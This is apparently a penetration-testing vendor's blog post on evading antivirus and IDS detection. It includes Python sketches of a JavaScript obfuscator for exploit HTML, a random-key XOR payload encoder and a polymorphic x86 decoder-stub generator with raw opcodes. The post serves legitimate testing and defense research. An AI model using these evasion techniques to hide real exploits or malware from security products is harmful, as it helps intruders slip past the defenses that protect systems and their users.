A common question I get from customers and non-customers alike is how our products can help them assess the effectiveness of their defensive products and measure the additional security those investments provide. In many environments patches or fixes cannot be applied (either at all or in a timely manner), so a compensating control (antivirus or some kind of IDS/IPS) is deployed instead to reduce or eliminate the threat the vulnerability poses to the business.

When you consider our solutions and those defensive technologies, you really have two products directly opposed to each other. Our products are designed and engineered to let you test your environments and defenses using real-world attack techniques; those defensive products are intended to stop real-world attacks from gaining any foothold in the environment. What does this mean? In practice it means that when one of our exploits succeeds, half of our customers are ringing the makers of their defensive products to complain that the exploit wasn’t stopped, and when an exploit fails, half of our customers are calling us to complain that it didn’t evade the defensive product. We end up in a cat and mouse game; I would say race, but that implies a finish line, and I don’t see any sign of one.

It is an intellectually fun and exciting game, but the reality is that evading these defenses is hard, and even when you succeed you are not finished. When we implement a feature that evades AV or IDS/IPS-type products and release it to our customers, we don’t break out the champagne and reassign the folks who devised the evasion. Instead, we monitor the defensive products to see how they react to the change and design triggers/techniques to counter those reactions, and then the whole dance starts again.

To better highlight the different types of work we do around Exploit Effectiveness (our way of describing the need for exploits to beat the defenses trying to stop them), I asked Core Security developer Alejandro David Weil to describe a sample of the work he has been doing recently. I think you will agree that it offers an interesting insight into the methods we use to help our exploits avoid detection, and to help our customers better measure the effectiveness of the defenses they have invested in.

- Alex Horan, CORE IMPACT Product Manager

 

The Many Faces of Exploit Effectiveness - by CORE IMPACT developer Alejandro David Weil

A few months ago, the Core Security Exploit Effectiveness team started digging deeper into the evasion techniques that we build into our products. This is a really broad topic, and it would be impossible to comprehensively cover our evasion capabilities in one post. Exploit effectiveness applies to almost every penetration testing feature we offer, and when building our products we frequently tackle a number of considerations, such as:

  • choosing the best connection method
  • defining an exploit selection order
  • generating less-suspicious network traffic

However, antivirus and IDS evasion consistently rises above the rest, since catching attackers is precisely what those products are built to do.

Well, our job at Core Security is to help you test your organization against real-world attacks. We’re therefore constantly looking for ways to circumvent defensive technologies and demonstrate how attackers can still take advantage of vulnerabilities, with or without the latest AV or IDS in place. Surprisingly (or maybe not), it is still possible to bypass these protections using some well-known techniques.

Case Study: Client-Side Evasion

We recently took a CORE IMPACT client-side exploit for a vulnerability in a Microsoft ActiveX control and ran it against replicas of a vulnerable machine, each protected by one of nine of the most popular antivirus solutions. This relatively standard attack was detected by only two of the AVs. Although we expected the exploit to be flagged by more than two solutions, those two detections proved that we still had work to do.

Solution A: HTML Obfuscation

The first antivirus that blocked the exploit is, in my opinion, the best-known antivirus software on the market. It detected exactly the vulnerability the exploit was designed to target. Since the AV knew what we were attacking, it might appear at first glance that there was little we could do; nonetheless, I began some tests to learn exactly how it detected the attack. However, a co-worker soon suggested that I simply obfuscate the HTML containing the call to the vulnerable function. That did the trick, so I never had to determine how the attack was detected; I just had to “cloak” it.

We created the obfuscation capability by recursively parsing the HTML and JavaScript code, splitting it into chunks, and re-encoding it randomly, several times over, with dedicated JavaScript functions. Among other things, the encoding functions provide symbol and string compression and translation to randomly defined character sets.
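
To give a feel for the idea, here is a deliberately minimal Python sketch, not our actual implementation: the function name, chunk sizes, and character-code shift are invented for illustration, and the shipping obfuscator does far more (recursive parsing, multiple encoding passes, compression, and randomized character sets).

    import random

    def obfuscate_js(script: str) -> str:
        # Split the script into randomly sized chunks so no long literal survives.
        size = random.randint(8, 24)
        chunks = [script[i:i + size] for i in range(0, len(script), size)]
        # Shift every character code by a random key; the page undoes the shift at load time.
        key = random.randint(1, 50)
        encoded = [[ord(c) + key for c in chunk] for chunk in chunks]
        name = "_" + "".join(random.choice("abcdefghijklmnop") for _ in range(8))
        arrays = ",".join("[" + ",".join(map(str, chunk)) + "]" for chunk in encoded)
        # Emit JavaScript that rebuilds the original source and evaluates it.
        return ("<script>var %s=[%s];eval(%s.map(function(a){return a.map(function(n)"
                "{return String.fromCharCode(n-%d);}).join('');}).join(''));</script>"
                % (name, arrays, name, key))

Every run produces a different variable name, chunk layout, and key, so a signature written against the literal exploit HTML no longer matches.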

Solution B: The Mutable Decoder

Solving the next evasion challenge was a little more complex, so bear with me here – it’s interesting.

We had recently been working on a machine-code encoder to defeat string matching, the detection technique AV products have relied on since their earliest days. To evade it, one of the first things many virus writers do is encrypt their code with different keys and/or algorithms so that no substring-based pattern can be extracted from it. This approach seems fine at first glance, but the problem remains that the virus still has to carry code that decrypts the malicious payload, and that decrypting code cannot always be the same (again, to avoid fingerprinting). And because the mutated decoder has to be generated by the virus code itself, defensive solution vendors can take one instance of the virus, analyze it, and make it generate its different decoders, ultimately aiding their string matching efforts.
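
As a toy illustration of that first step (a hypothetical sketch, not code from our products), a single-byte XOR pass with a fresh key makes the same payload look different every time it is generated:

    import random

    def xor_encode(payload: bytes) -> bytes:
        # A fresh key each time means no fixed substring survives for a signature.
        key = random.randint(1, 255)
        return bytes(b ^ key for b in payload)

    payload = b"\xcc" * 32            # stand-in for real shellcode
    print(xor_encode(payload).hex())  # output varies with the randomly chosen key
    print(xor_encode(payload).hex())

The decoder stub that has to travel with those bytes is the part that can still be fingerprinted, and that is exactly the problem the Mutable Decoder addresses.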

We therefore took the approach of generating a different variation of the decoder each time one of our exploits requests one. Also, since we generate the decoders from Python, we can perform more complex code generation than we could if we did the same in assembler. This approach effectively mutates the decoder routine and therefore enhances the exploit’s overall effectiveness.

The Mutable Decoder supports the inlineegg code generation library we use to make code eggs. In designing the Decoder, we followed several criteria including:

  • the routine had to be built from instructions and higher-level blocks of code for which we could generate, and automatically switch between, different versions
  • there could be no fixed byte in any position
  • it had to employ deterministic generation
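
To make this concrete, here is a heavily simplified Python sketch of what such a generator might look like. It emits a classic jmp/call/pop, single-byte-XOR decoder for x86, randomly picks among equivalent instruction encodings, and sprinkles in harmless filler. The instruction variants, filler choices, and layout are illustrative only; the real generator is far richer.

    import random
    import struct

    # Interchangeable ways to zero ECX; picking one at random varies the byte pattern.
    ZERO_ECX = [b"\x31\xc9",   # xor ecx, ecx
                b"\x29\xc9",   # sub ecx, ecx
                b"\x33\xc9"]   # xor ecx, ecx (alternate encoding)

    # Harmless filler ("garbage") that touches neither ESI, ECX, nor the payload.
    GARBAGE = [b"", b"\x90", b"\x90\x90"]   # nothing, nop, nop nop

    def mutable_decoder(payload: bytes) -> bytes:
        key = random.randint(1, 255)
        encoded = bytes(b ^ key for b in payload)
        assert len(encoded) <= 255                 # single-byte loop counter in this sketch

        body  = b"\x5e"                            # pop esi       ; esi -> encoded bytes
        body += random.choice(GARBAGE)             # filler that shifts later byte positions
        body += random.choice(ZERO_ECX)            # ecx = 0
        body += b"\xb1" + bytes([len(encoded)])    # mov cl, len
        body += b"\x80\x36" + bytes([key])         # xor byte [esi], key
        body += b"\x46"                            # inc esi
        body += b"\xe2\xfa"                        # loop back to the xor
        body += b"\xeb\x05"                        # jmp short over the call, into the decoded payload

        stub  = b"\xeb" + bytes([len(body)])       # jmp short call_decoder
        stub += body
        stub += b"\xe8" + struct.pack("<i", -(len(body) + 5))  # call decoder (pushes payload address)
        return stub + encoded

Even this toy version already yields nine distinct byte patterns per key (three ECX variants times three filler choices); with many more variant points and filler slots, the numbers below follow.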

As a result, we ended up with over a thousand different decoders, through which we spread “garbage code”: machine instructions chosen under restrictions that prevent them from affecting the decoder’s behavior. That gave us (are you ready for this?) 1,191,310,725,003,002,020 (about 1.19e+18) garbage codes. Mixed through the decoder routines, these translate to more than 1.19e+21 different decoder codes. And we can still generate decoder code deterministically, which lets us test them all before release. Needless to say, this makes it much harder for defensive solutions to make a string-based match.

“But what about AV sandboxing and behavioral analysis?” you ask.

It’s true that the Mutable Decoder was built with IDS/IPS/HIPS evasion in mind, because its focus is making string matches harder to obtain. We didn’t think it would be effective against antivirus, since AV solutions typically use sandboxing/code emulation and behavioral analysis, which render an encoder useless. Sandboxing and code emulation leave the suspicious or unexpected code naked and easily detectable once the decoding routine has executed, and behavioral analysis is designed to detect the suspicious behavior while it is happening. However, these techniques require much more processing power and execution time, so if the AV knows exactly what to look for and where to look, string matching is often sufficient.

However, we were wrong about the Mutable Decoder’s inability to evade AV. When we analyzed how the second antivirus solution detected our attack, we found the alert was triggered by a small fragment of code our exploits use to deploy an IMPACT agent. Running that triggering code through the Mutable Decoder was enough to bypass the antivirus alert and safely install the IMPACT agent!

What we learned

  • Even vexing defensive challenges that at first seem impossible for attackers (and penetration testers) to surmount can be solved through creative research.
  • The deeper we dive into the subject of exploit effectiveness, the more potential for improvement we uncover. For example, while building the Mutable Decoder we had to create a garbage egg to generate valid (but restricted) machine code for obfuscation, and we realized the same generator would also be useful for producing padding and nopsled chunks.
  • In client-side environments, antivirus products face the same constraints as any malware detection: the deeper the analysis they perform, the longer it takes and the more it degrades performance.
  • Criminals are in a race with defensive solution vendors, so we have to be in that race, too. Like attackers in the wild, we are continuously working to understand detection techniques and find ways to bypass them.
  • Old techniques can still come in handy!

- Alejandro David Weil, Developer